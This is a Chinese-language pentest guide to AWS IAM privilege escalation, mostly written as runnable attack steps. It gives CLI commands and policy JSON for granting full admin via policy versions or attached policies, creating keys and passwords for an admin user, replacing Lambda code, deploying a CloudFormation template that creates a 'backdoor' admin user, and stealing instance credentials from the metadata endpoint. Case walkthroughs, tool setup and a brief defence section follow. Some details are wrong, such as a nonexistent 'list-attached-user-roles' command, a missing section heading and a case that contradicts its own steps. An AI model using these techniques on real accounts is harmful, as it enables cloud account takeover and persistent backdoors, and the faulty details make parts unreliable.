AWS IAM 权限提升
概述
AWS IAM 权限提升是云安全渗透测试的核心技能。通过滥用 IAM 配置错误,攻击者可以从低权限角色提升到管理员权限。
攻击等级: ⭐⭐⭐⭐⭐
适用场景: 云环境渗透、横向移动
IAM 基础
核心概念
| 术语 |
说明 |
| User |
IAM 用户 |
| Role |
IAM 角色 (可被扮演) |
| Group |
用户组 |
| Policy |
权限策略 (JSON) |
| Principal |
主体 (用户/角色/服务) |
| Action |
操作 (s3:GetObject) |
| Resource |
资源 (ARN) |
策略结构
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": "s3:GetObject",
"Resource": "arn:aws:s3:::bucket/*"
}
]
}
信息收集
枚举当前权限
# 查看当前身份
aws sts get-caller-identity
# 查看附加策略
aws iam list-attached-user-roles --user-name USERNAME
aws iam list-attached-role-policies --role-name ROLENAME
# 查看内联策略
aws iam list-user-policies --user-name USERNAME
aws iam get-user-policy --user-name USERNAME --policy-name POLICY
# 查看完整权限 (CloudSploit)
python3 enumerate.py --profile PROFILE
自动化工具
# Pacu (AWS 渗透框架)
pacu
> run iam__enum_permissions
# CloudSploit
node cloudsploit.js
# ScoutSuite
python3 scout.py aws --profile PROFILE
常见提权手法
1. iam:PassRole + iam:CreatePolicyVersion
原理: 创建新策略版本,附加到自身。
所需权限:
{
"Effect": "Allow",
"Action": [
"iam:CreatePolicyVersion",
"iam:SetDefaultPolicyVersion"
],
"Resource": "arn:aws:iam::*:policy/POLICY_NAME"
}
利用:
# 1. 创建新策略版本
aws iam create-policy-version \
--policy-arn arn:aws:iam::ACCOUNT_ID:policy/POLICY \
--policy-document '{
"Version": "2012-10-17",
"Statement": [{
"Effect": "Allow",
"Action": "*",
"Resource": "*"
}]
}' \
--set-as-default
# 2. 验证权限
aws sts get-caller-identity
2. iam:AttachUserPolicy / iam:AttachRolePolicy
原理: 直接附加管理员策略。
所需权限:
{
"Effect": "Allow",
"Action": [
"iam:AttachUserPolicy",
"iam:AttachRolePolicy"
],
"Resource": "*"
}
利用:
# 附加管理员策略
aws iam attach-user-policy \
--user-name TARGET_USER \
--policy-arn arn:aws:iam::aws:policy/AdministratorAccess
# 或附加到角色
aws iam attach-role-policy \
--role-name TARGET_ROLE \
--policy-arn arn:aws:iam::aws:policy/AdministratorAccess
3. iam:CreateAccessKey
原理: 为其他用户创建访问密钥。
所需权限:
{
"Effect": "Allow",
"Action": "iam:CreateAccessKey",
"Resource": "arn:aws:iam::*:user/*"
}
利用:
# 为管理员创建密钥
aws iam create-access-key --user-name admin
# 输出
{
"AccessKey": {
"AccessKeyId": "AKIA...",
"SecretAccessKey": "SECRET"
}
}
# 使用新密钥
aws configure --profile admin
4. iam:UpdateAssumeRolePolicy + sts:AssumeRole
原理: 修改角色信任策略,允许自己扮演。
所需权限:
{
"Effect": "Allow",
"Action": [
"iam:UpdateAssumeRolePolicy",
"sts:AssumeRole"
],
"Resource": "arn:aws:iam::*:role/TARGET_ROLE"
}
利用:
# 1. 修改信任策略
aws iam update-assume-role-policy \
--role-name TARGET_ROLE \
--policy-document '{
"Version": "2012-10-17",
"Statement": [{
"Effect": "Allow",
"Principal": {"AWS": "arn:aws:iam::ACCOUNT_ID:user/ATTACKER"},
"Action": "sts:AssumeRole"
}]
}'
# 2. 扮演角色
aws sts assume-role \
--role-arn arn:aws:iam::ACCOUNT_ID:role/TARGET_ROLE \
--role-session-name attack
# 3. 使用临时凭证
export AWS_ACCESS_KEY_ID=...
export AWS_SECRET_ACCESS_KEY=...
export AWS_SESSION_TOKEN=...
5. iam:CreateLoginProfile
原理: 为用户创建控制台登录密码。
所需权限:
{
"Effect": "Allow",
"Action": "iam:CreateLoginProfile",
"Resource": "arn:aws:iam::*:user/*"
}
利用:
# 创建登录密码
aws iam create-login-profile \
--user-name admin \
--password 'P@ssw0rd123!' \
--password-reset-required
# 登录控制台
# https://ACCOUNT_ID.signin.aws.amazon.com/console
6. lambda:UpdateFunctionCode + lambda:InvokeFunction
原理: 修改 Lambda 代码,以 Lambda 角色执行。
所需权限:
{
"Effect": "Allow",
"Action": [
"lambda:UpdateFunctionCode",
"lambda:InvokeFunction"
],
"Resource": "*"
}
利用:
# 1. 创建恶意代码
cat > exploit.py << EOF
import boto3
import os
def lambda_handler(event, context):
# 获取 Lambda 角色凭证
role_arn = os.environ['AWS_ROLE_ARN']
# 执行提权操作
iam = boto3.client('iam')
iam.attach_role_policy(
RoleName='TARGET_ROLE',
PolicyArn='arn:aws:iam::aws:policy/AdministratorAccess'
)
EOF
# 2. 打包
zip exploit.zip exploit.py
# 3. 更新函数代码
aws lambda update-function-code \
--function-name TARGET_FUNCTION \
--zip-file fileb://exploit.zip
# 4. 执行
aws lambda invoke \
--function-name TARGET_FUNCTION \
output.json
7. ec2:RunInstances + iam:PassRole
原理: 启动带有高权限角色的 EC2。
所需权限:
{
"Effect": "Allow",
"Action": [
"ec2:RunInstances",
"iam:PassRole"
],
"Resource": "*"
}
利用:
# 1. 启动 EC2 (带管理员角色)
aws ec2 run-instances \
--image-id ami-12345678 \
--instance-type t2.micro \
--iam-instance-profile Name=ADMIN_PROFILE
# 2. SSH 登录
ssh -i key.pem ec2-user@INSTANCE_IP
# 3. 获取实例凭证
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ADMIN_PROFILE
8. glue:UpdateDevEndpoint / glue:CreateDevEndpoint
原理: 修改 AWS Glue 开发端点,注入 SSH 密钥。
所需权限:
{
"Effect": "Allow",
"Action": [
"glue:UpdateDevEndpoint",
"glue:CreateDevEndpoint"
],
"Resource": "*"
}
利用:
# 1. 生成 SSH 密钥
ssh-keygen -t rsa
# 2. 更新端点
aws glue update-dev-endpoint \
--endpoint-name TARGET_ENDPOINT \
--public-key "$(cat ~/.ssh/id_rsa.pub)"
# 3. SSH 连接
ssh -i ~/.ssh/id_rsa glueservice@ENDPOINT_IP
原理: 创建 CloudFormation 堆栈,以堆栈角色执行。
所需权限:
{
"Effect": "Allow",
"Action": "cloudformation:CreateStack",
"Resource": "*"
}
利用:
# 1. 创建恶意模板
cat > exploit.yaml << EOF
AWSTemplateFormatVersion: '2010-09-09'
Resources:
BackdoorUser:
Type: AWS::IAM::User
Properties:
UserName: backdoor
BackdoorPolicy:
Type: AWS::IAM::Policy
Properties:
PolicyName: AdminAccess
PolicyDocument:
Version: '2012-10-17'
Statement:
- Effect: Allow
Action: '*'
Resource: '*'
Users: [backdoor]
EOF
# 2. 创建堆栈
aws cloudformation create-stack \
--stack-name exploit \
--template-body file://exploit.yaml \
--capabilities CAPABILITY_NAMED_IAM
# 3. 使用后门用户
aws configure --profile backdoor
10. sts:AssumeRole + 过度权限角色
原理: 扮演具有过度权限的角色。
检测:
# 列出可扮演的角色
aws iam list-roles --query 'Roles[?AssumeRolePolicyDocument]'
# 检查角色权限
aws iam get-role-policy --role-name ROLE_NAME --policy-name POLICY
利用:
# 扮演角色
aws sts assume-role \
--role-arn arn:aws:iam::ACCOUNT_ID:role/OVERPERMISSIONED_ROLE \
--role-session-name attack
# 使用临时凭证
export AWS_ACCESS_KEY_ID=...
export AWS_SECRET_ACCESS_KEY=...
export AWS_SESSION_TOKEN=...
实战案例
案例 1: 开发者到管理员
# 1. 初始访问 (泄露的访问密钥)
aws configure --profile dev
aws sts get-caller-identity
# 2. 枚举权限
pacu
> set_keys DEV_KEY DEV_SECRET
> run iam__enum_permissions
# 3. 发现 iam:AttachUserPolicy
# 但仅限于特定策略
# 4. 创建新策略版本
aws iam create-policy-version \
--policy-arn arn:aws:iam::ACCOUNT_ID:policy/DeveloperPolicy \
--policy-document '{
"Version": "2012-10-17",
"Statement": [{
"Effect": "Allow",
"Action": "*",
"Resource": "*"
}]
}' \
--set-as-default
# 5. 验证提权
aws iam list-users # 成功!
案例 2: EC2 实例角色提权
# 1. 获取实例凭证
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/INSTANCE_ROLE
# 2. 配置凭证
export AWS_ACCESS_KEY_ID=...
export AWS_SECRET_ACCESS_KEY=...
export AWS_SESSION_TOKEN=...
# 3. 枚举权限
python3 enumerate.py
# 4. 发现 iam:PassRole + ec2:RunInstances
# 5. 启动新 EC2 (带管理员角色)
aws ec2 run-instances \
--image-id ami-12345678 \
--instance-type t2.micro \
--iam-instance-profile Name=AdminProfile
# 6. SSH 登录新实例
# 获取管理员权限
案例 3: Lambda 提权
# 1. 列出 Lambda 函数
aws lambda list-functions
# 2. 检查权限
aws lambda get-policy --function-name TARGET
# 3. 发现 lambda:UpdateFunctionCode
# 4. 创建恶意代码
cat > exploit.py << EOF
import boto3
def lambda_handler(event, context):
iam = boto3.client('iam')
iam.attach_user_policy(
UserName='CURRENT_USER',
PolicyArn='arn:aws:iam::aws:policy/AdministratorAccess'
)
EOF
# 5. 更新并执行
zip exploit.zip exploit.py
aws lambda update-function-code --function-name TARGET --zip-file fileb://exploit.zip
aws lambda invoke --function-name TARGET output.json
# 6. 验证权限
aws iam list-users # 成功!
工具
Pacu
# 安装
git clone https://github.com/RhinoSecurityLabs/pacu
cd pacu
pip install -r requirements.txt
# 使用
python3 pacu.py
> set_keys ACCESS_KEY SECRET_KEY
> run iam__enum_permissions
> run iam__privesc_scan
> run ec2__enum
CloudSploit
# 安装
git clone https://github.com/aquasecurity/cloudsploit
cd cloudsploit
npm install
# 扫描
node index.js --profile PROFILE
ScoutSuite
# 安装
pip install scoutsuite
# 扫描
python3 scout.py aws --profile PROFILE
python3 scout.py aws --access-keys ACCESS_KEY SECRET_KEY
enumerate-iam
# 安装
git clone https://github.com/andresriancho/enumerate-iam
cd enumerate-iam
pip install -r requirements.txt
# 枚举
python3 enumerate-iam.py --access-key KEY --secret-key SECRET
防御建议
最小权限
// ❌ 过度权限
{
"Effect": "Allow",
"Action": "*",
"Resource": "*"
}
// ✅ 最小权限
{
"Effect": "Allow",
"Action": [
"s3:GetObject",
"s3:PutObject"
],
"Resource": "arn:aws:s3:::specific-bucket/*"
}
权限边界
# 设置权限边界
aws iam put-user-permissions-boundary \
--user-name USERNAME \
--permissions-boundary arn:aws:iam::ACCOUNT_ID:policy/PermissionsBoundary
监控检测
# CloudTrail 告警
# 监控以下事件:
- iam:CreatePolicyVersion
- iam:SetDefaultPolicyVersion
- iam:AttachUserPolicy
- iam:AttachRolePolicy
- iam:CreateAccessKey
- sts:AssumeRole
# Config 规则
# 检查 IAM 策略变更
参考链接